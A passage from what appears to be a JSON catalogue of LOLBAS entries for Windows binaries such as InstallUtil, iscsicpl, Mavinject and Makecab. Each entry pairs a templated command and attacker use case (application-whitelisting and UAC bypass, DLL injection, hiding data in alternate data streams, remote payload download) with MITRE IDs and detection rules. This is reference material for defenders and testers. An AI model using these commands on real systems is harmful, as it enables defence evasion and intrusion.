suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ilasm-exe:0","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /exe","description":"Binary file used by .NET to compile C#/intermediate (IL) code to .exe","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ilasm-exe:1","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /dll","description":"Binary file used by .NET to compile C#/intermediate (IL) code to dll","usecase":"A description of the usecase","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:infdefaultinstall-exe:0","toolId":"lolbas:infdefaultinstall-exe","toolName":"Infdefaultinstall.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InfDefaultInstall.exe {PATH:.inf}","description":"Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.","usecase":"Code execution","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/KyleHanslovan/status/911997635455852544","https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/","https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:installutil-exe:0","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:installutil-exe:1","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:installutil-exe:2","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"InstallUtil.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:iscsicpl-exe:0","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"c:\\windows\\syswow64\\iscsicpl.exe","description":"c:\\windows\\syswow64\\iscsicpl.exe has a DLL injection through `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll`, resulting in UAC bypass.","usecase":"Execute a custom DLL via a trusted high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:iscsicpl-exe:1","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"iscsicpl.exe","description":"Both `c:\\windows\\system32\\iscsicpl.exe` and `c:\\windows\\system64\\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:jsc-exe:0","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:jsc-exe:1","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe /t:library {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ldifde-exe:0","toolId":"lolbas:ldifde-exe","toolName":"Ldifde.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Ldifde -i -f {PATH:.ldf}","description":"Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"admin","fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml"}],"references":["https://twitter.com/0gtweet/status/1564968845726580736","https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:0","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:1","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:2","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compresses the target file and stores it in the target file.","usecase":"Download file and compress into a cab file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:3","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"makecab /F {PATH:.ddf}","description":"Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mavinject-exe:0","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}","description":"Inject evil.dll into a process with PID 3110.","usecase":"Inject dll file into running process","mitre":["T1218.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mavinject-exe:1","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll","description":"Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172","usecase":"Inject dll file into running process","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:microsoft-workflow-compiler-exe:0","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:microsoft-workflow-compiler-exe:1","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type